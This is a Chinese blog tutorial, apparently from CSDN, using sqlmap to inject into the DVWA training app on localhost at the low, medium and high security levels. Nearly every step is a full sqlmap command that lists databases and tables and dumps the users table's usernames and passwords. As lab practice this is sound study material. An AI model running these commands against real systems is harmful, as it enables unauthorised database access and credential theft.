SQLMap 注入 DVWA实战

本文详细介绍了在不同安全级别下对DVWA(Damn Vulnerable Web Application)进行SQL注入攻击的过程。从Low、Medium到High级别,分别展示了如何利用sqlmap工具进行数据探测、数据库查询和信息获取。在Low级别,通过URL直接注入并使用cookie;Medium级别利用POST数据进行注入;High级别则涉及二阶SQL注入,通过指定响应页面进行爆破。文章揭示了SQL注入的常见手法,并提醒读者关注Web应用的安全防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、low级别
1、进入dvwa界面输入1,点击Submit,得到链接
http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#
 
 
2、我们用sqlmap进行爆破
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#"
 
我们可以看到需要跳转到login的页面,所以,认为这里是需要cookie的。
 
3、我们查看cookie后将它添加进去
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"

 

 
 
 
4、查询数据库
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -dbs
 
5、查看dvwa数据库的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -tables
6、查看表中的字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users --columns
 
 

7、获取字段的信息

sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"  -D dvwa -T users -C user,password --dump
 
二、Medium级别
1、我们输入1,点击Sumbit后发现URL没有改变
 
2、我们利用burpsuit抓包分析, 来查看post方式提交的数据
 
3、 由于这里是使用 post 方式进行传输的,所以我们这里需要使用 --data 参数把数据引入过来
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" --dbs     查看数据库
 
4、查看dvwa数据库下的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -tables
 
5、查看字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users --columns
 
6、获取字段中的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users -C user,password --dump
 
三、High级别
1、首先我们注意到这个页面,点击之后会跳转到另外一个页面,所以这个如果想使用sqlmap进行爆破,我们还需要引入一个知识点(参考别人的博客得到)
–second-order(二阶sql注入)
有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
-–second-order后面跟一个判断页面的URL地址。 (来自简书 作者 m3lon)
 
2、 我们利用burpsuite进行抓包,因为这里无法在页面上获取 post 或者 get 的值。
 
3、我们发现获取到的数据和Medium类似,我们利用sqlmap进行注入
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php"  --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -dbs
4、和low级别,medium级别过程一样,我们同样可以获取到数据
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php"  --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/"  -D dvwa -T users -C user,password --dump
 
 
 
 
 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值